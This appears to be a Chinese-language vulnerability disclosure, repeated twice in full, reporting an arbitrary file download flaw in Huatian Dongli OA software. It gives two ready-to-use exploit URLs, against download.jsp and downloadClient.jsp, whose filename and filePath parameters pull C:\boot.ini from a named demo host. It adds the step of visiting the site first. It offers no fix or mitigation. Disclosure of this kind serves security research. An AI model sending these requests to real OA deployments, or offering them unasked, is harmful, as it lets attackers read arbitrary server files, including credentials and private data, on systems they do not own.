VULHUB ™

### 简要描述： 华天动力OA任意文件下载（两处） ### 详细说明： 通用漏洞， 以http://demo.oa8000.com为例。 1.首先必须先访问http://demo.oa8000.com 2. [第一处] 访问 http://demo.oa8000.com/OAapp/jsp/download.jsp?filename=boot.ini&filePath=C%3A%2Fboot.ini&noDecode=1 即可下载C:\boot.ini filename为目标文件名，filePath为目标文件绝对地址 [第二处] 这次是downloadClient.jsp http://demo.oa8000.com/OAapp/jsp/downloadClient.jsp?filename=boot.ini&filePath=C%3A%2Fboot.ini&noDecode=1 即可下载C:\boot.ini filename为目标文件名 filePath为目标文件绝对地址 ### 漏洞证明： 再次强调，必须先访问http://demo.oa8000.com

### 简要描述： 华天动力OA任意文件下载（两处） ### 详细说明： 通用漏洞， 以http://demo.oa8000.com为例。 1.首先必须先访问http://demo.oa8000.com 2. [第一处] 访问 http://demo.oa8000.com/OAapp/jsp/download.jsp?filename=boot.ini&filePath=C%3A%2Fboot.ini&noDecode=1 即可下载C:\boot.ini filename为目标文件名，filePath为目标文件绝对地址 [第二处] 这次是downloadClient.jsp http://demo.oa8000.com/OAapp/jsp/downloadClient.jsp?filename=boot.ini&filePath=C%3A%2Fboot.ini&noDecode=1 即可下载C:\boot.ini filename为目标文件名 filePath为目标文件绝对地址 ### 漏洞证明： 再次强调，必须先访问http://demo.oa8000.com